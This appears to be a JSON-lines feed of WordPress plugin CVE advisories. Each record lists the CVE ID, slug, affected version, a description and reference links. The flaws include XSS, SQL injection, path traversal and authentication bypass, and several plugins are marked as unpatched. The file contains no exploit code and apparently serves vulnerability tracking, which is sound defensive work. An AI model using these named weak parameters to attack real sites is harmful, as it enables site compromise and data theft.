{"CVE_ID":"CVE-2023-0721","slug":"metform","versionImpact":"3.3.0","description":"The Metform Elementor Contact Form Builder plugin for WordPress is vulnerable to CSV injection in versions up to, and including, 3.3.0. This allows unauthenticated attackers to embed untrusted input into exported CSV files, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/entries\\\/export.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/core\\\/entries\\\/export.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd85a72-1872-4c4f-8ba7-7f91b0b37d4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ccd85a72-1872-4c4f-8ba7-7f91b0b37d4a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5468","slug":"slick-contact-forms","versionImpact":"1.3.7","description":"The Slick Contact Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'dcscf-link' shortcode in versions up to, and including, 1.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22c63226-2bc6-40be-a5d1-1bd169fc78b8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22c63226-2bc6-40be-a5d1-1bd169fc78b8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slick-contact-forms\\\/tags\\\/1.3.7\\\/dcwp_slick_contact.php#L71\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/slick-contact-forms\\\/tags\\\/1.3.7\\\/dcwp_slick_contact.php#L71\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1496","slug":"featured-image-from-url","versionImpact":"4.6.2","description":"The Featured Image from URL (FIFU) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the fifu_input_url parameter in all versions up to, and including, 4.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d1ea1c5-6a9e-4b77-bfdf-62e50d4a4c03?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7d1ea1c5-6a9e-4b77-bfdf-62e50d4a4c03?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-from-url\\\/tags\\\/4.6.2\\\/elementor\\\/widgets\\\/widget.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/featured-image-from-url\\\/tags\\\/4.6.2\\\/elementor\\\/widgets\\\/widget.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037479%40featured-image-from-url%2Ftrunk&old=3034300%40featured-image-from-url%2Ftrunk&sfp_email=&sfph_mail=#file9\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037479%40featured-image-from-url%2Ftrunk&old=3034300%40featured-image-from-url%2Ftrunk&sfp_email=&sfph_mail=#file9\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13603","slug":"wise-forms","versionImpact":"1.2.0","description":"The Wise Forms WordPress plugin through 1.2.0 does not sanitise and escape some of its settings, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks via malicious form submissions.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/234a8d22-e6c6-4819-9ac0-434a96b3462d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/234a8d22-e6c6-4819-9ac0-434a96b3462d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0687","slug":"spiritual-gifts-survey","versionImpact":"0.9.10","description":"The Spiritual Gifts Survey (and optional S.H.A.P.E survey) WordPress plugin through 0.9.10 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against only unauthenticated users.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c1e21e1-32f2-4a20-9262-80e1cdab534d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c1e21e1-32f2-4a20-9262-80e1cdab534d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4419","slug":"hot-random-image","versionImpact":"1.9.2","description":"The Hot Random Image plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.9.2 via the 'path' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to access arbitrary images with allowed extensions, outside of the originally intended directory.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hot-random-image\\\/tags\\\/1.9.2\\\/hot_random_image.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hot-random-image\\\/tags\\\/1.9.2\\\/hot_random_image.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298033\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298033\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hot-random-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hot-random-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6628232-0bd1-4194-8322-36084b1eb0f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6628232-0bd1-4194-8322-36084b1eb0f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2732","slug":" \tmstore-api","versionImpact":"3.9.2","description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2916124%40mstore-api&old=2915729%40mstore-api&sfp_email=&sfph_mail=#file58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2916124%40mstore-api&old=2915729%40mstore-api&sfp_email=&sfph_mail=#file58\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/3.9.0\\\/controllers\\\/listing-rest-api\\\/class.api.fields.php#L1079\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/3.9.0\\\/controllers\\\/listing-rest-api\\\/class.api.fields.php#L1079\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f00761a7-fe24-49a3-b3e3-a471e05815c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f00761a7-fe24-49a3-b3e3-a471e05815c1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0710","slug":"metform","versionImpact":"3.3.0","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Cross-Site Scripting by using the 'fname' attribute of the 'mf_thankyou' shortcode to echo unescaped form submissions in versions up to, and including, 3.3.0. This allows authenticated attackers, with contributor-level permissions or above, to inject arbitrary web scripts in pages that will execute when the victim visits a a page containing the shortcode when the submission id is present in the query string. Note that getting the JavaScript to execute requires user interaction as the victim must visit a crafted link with the form entry id, but the script itself is stored in the site database. Additionally this requires successful payment, increasing the complexity.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89a98053-33c7-4e75-87a1-0f483a990641?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89a98053-33c7-4e75-87a1-0f483a990641?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1492","slug":"wpify-woo","versionImpact":"4.0.8","description":"The WPify Woo Czech plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the maybe_send_to_packeta function in all versions up to, and including, 4.0.8. This makes it possible for unauthenticated attackers to obtain shipping details for orders as long as the order number is known.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44f691f2-b3f4-49b7-8710-015b5b11db18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44f691f2-b3f4-49b7-8710-015b5b11db18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037482%40wpify-woo%2Ftrunk&old=3028980%40wpify-woo%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037482%40wpify-woo%2Ftrunk&old=3028980%40wpify-woo%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4970","slug":"wp-widget-bundle","versionImpact":"2.0.0","description":"The Widget Bundle WordPress plugin through 2.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4a9fc352-7ec2-4992-9cda-7bdca4f42788\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4a9fc352-7ec2-4992-9cda-7bdca4f42788\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43224","slug":"yamaps","versionImpact":"0.6.27","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Yuri Baranov YaMaps for WordPress allows Stored XSS.This issue affects YaMaps for WordPress: from n\/a through 0.6.27.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/yamaps\\\/wordpress-yamaps-for-wordpress-plugin-plugin-0-6-27-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/yamaps\\\/wordpress-yamaps-for-wordpress-plugin-plugin-0-6-27-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8369","slug":"eventprime-event-calendar-management","versionImpact":"4.0.4.3","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access to Private or Password-protected events due to missing authorization checks in all versions up to, and including, 4.0.4.3. This makes it possible for unauthenticated attackers to view private or password-protected events.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97174ec0-a2b7-455e-9bf8-b6f51546beee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97174ec0-a2b7-455e-9bf8-b6f51546beee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/eventprime-event-calendar-management\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/eventprime-event-calendar-management\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11009","slug":"automatic-internal-links-for-seo","versionImpact":"1.2.1","description":"The Internal Linking for SEO traffic & Ranking \u2013 Auto internal links (100% automatic) plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018post_id\u2019 parameter in all versions up to, and including, 1.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197510\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197510\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/automatic-internal-links-for-seo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/automatic-internal-links-for-seo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35a690c5-dc7e-4bb7-be5b-c70bd0ea7d10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35a690c5-dc7e-4bb7-be5b-c70bd0ea7d10?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-56022","slug":"preloader-sws","versionImpact":"1.2.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WordPress Monsters Preloader by WordPress Monsters allows Reflected XSS.This issue affects Preloader by WordPress Monsters: from n\/a through 1.2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/preloader-sws\\\/vulnerability\\\/wordpress-preloader-by-wordpress-monsters-plugin-1-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/preloader-sws\\\/vulnerability\\\/wordpress-preloader-by-wordpress-monsters-plugin-1-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23637","slug":"wp-xintaoke","versionImpact":"1.1.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound ???WordPress?? allows Reflected XSS. This issue affects ???WordPress??: from n\/a through 1.1.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-xintaoke\\\/vulnerability\\\/wordpress-wordpress-plugin-1-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-xintaoke\\\/vulnerability\\\/wordpress-wordpress-plugin-1-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2484","slug":"multi-video-box","versionImpact":"1.5.2","description":"The Multi Video Box plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'video_id' and 'group_id' parameters in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-video-box\\\/tags\\\/1.5.2\\\/views\\\/group\\\/get_shortcode.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-video-box\\\/tags\\\/1.5.2\\\/views\\\/group\\\/get_shortcode.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-video-box\\\/tags\\\/1.5.2\\\/views\\\/video\\\/get_shortcode.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-video-box\\\/tags\\\/1.5.2\\\/views\\\/video\\\/get_shortcode.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/multi-video-box\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/multi-video-box\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/433e5ba3-c07e-48a1-a28b-781121d892ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/433e5ba3-c07e-48a1-a28b-781121d892ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2083","slug":"awesome-logo-carousel-block","versionImpact":"2.1.6","description":"The Logo Carousel Gutenberg Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018sliderId\u2019 parameter in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-logo-carousel-block\\\/tags\\\/2.1.3\\\/inc\\\/classes\\\/style.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-logo-carousel-block\\\/tags\\\/2.1.3\\\/inc\\\/classes\\\/style.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3271660\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3271660\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/awesome-logo-carousel-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/awesome-logo-carousel-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/604123f4-9247-489a-8fc8-478bfc697c7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/604123f4-9247-489a-8fc8-478bfc697c7f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4405","slug":"hot-random-image","versionImpact":"1.9.2","description":"The Hot Random Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018link\u2019 parameter in all versions up to, and including, 1.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hot-random-image\\\/tags\\\/1.9.2\\\/hot_random_image.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hot-random-image\\\/tags\\\/1.9.2\\\/hot_random_image.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298033\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298033\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hot-random-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hot-random-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5cff14e-e891-4569-afd8-2885ebb26401?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5cff14e-e891-4569-afd8-2885ebb26401?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6689","slug":"fl3r-accessibility-suite","versionImpact":"1.4","description":"The FL3R Accessibility Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's fl3raccessibilitysuite shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fl3r-accessibility-suite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fl3r-accessibility-suite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33f673b5-2bcb-4591-b589-4d7230b5c2e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33f673b5-2bcb-4591-b589-4d7230b5c2e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5835","slug":"droip","versionImpact":"2.2.0","description":"The Droip plugin for WordPress is vulnerable to unauthorized modification and access of data due to a missing capability check on the droip_post_apis() function in all versions up to, and including, 2.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform many actions as the AJAX hooks to several functions. Some potential impacts include arbitrary post deletion, arbitrary post creation, post duplication, settings update, user manipulation, and much more.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/droip.com\\\/\",\"name\":\"https:\\\/\\\/droip.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2e6b451-9835-4887-ade7-b18807223a88?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2e6b451-9835-4887-ade7-b18807223a88?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0709","slug":"metform","versionImpact":"3.3.0","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Cross-Site Scripting by using the 'mf_last_name' shortcode to echo unescaped form submissions in versions up to, and including, 3.3.0. This allows authenticated attackers, with contributor-level permissions or above, to inject arbitrary web scripts in pages that will execute when the victim visits a a page containing the shortcode when the submission id is present in the query string. Note that getting the JavaScript to execute requires user interaction as the victim must visit a crafted link with the form entry id, but the script itself is stored in the site database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25200656-a6a2-42f2-a607-26d4ff502cbf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25200656-a6a2-42f2-a607-26d4ff502cbf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5661","slug":"add-facebook","versionImpact":"1.5.4.6","description":"The Social Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'socialfeed' shortcode in all versions up to, and including, 1.5.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with author-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b145772-624e-4af0-9156-03c483bf8381?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b145772-624e-4af0-9156-03c483bf8381?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-facebook\\\/tags\\\/1.5.4.6\\\/public\\\/templates\\\/default\\\/template.php#L417\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-facebook\\\/tags\\\/1.5.4.6\\\/public\\\/templates\\\/default\\\/template.php#L417\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1475","slug":"coming-soon-maintenance-mode","versionImpact":"1.0.5","description":"The Coming Soon Maintenance Mode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.5 via the REST API. This makes it possible for unauthenticated attackers to obtain post and page content thus bypassing the protection provided by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e4a1a3-71d0-4cad-9807-f6bbc99ccb13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e4a1a3-71d0-4cad-9807-f6bbc99ccb13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037910%40coming-soon-maintenance-mode%2Ftrunk&old=3031487%40coming-soon-maintenance-mode%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037910%40coming-soon-maintenance-mode%2Ftrunk&old=3031487%40coming-soon-maintenance-mode%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
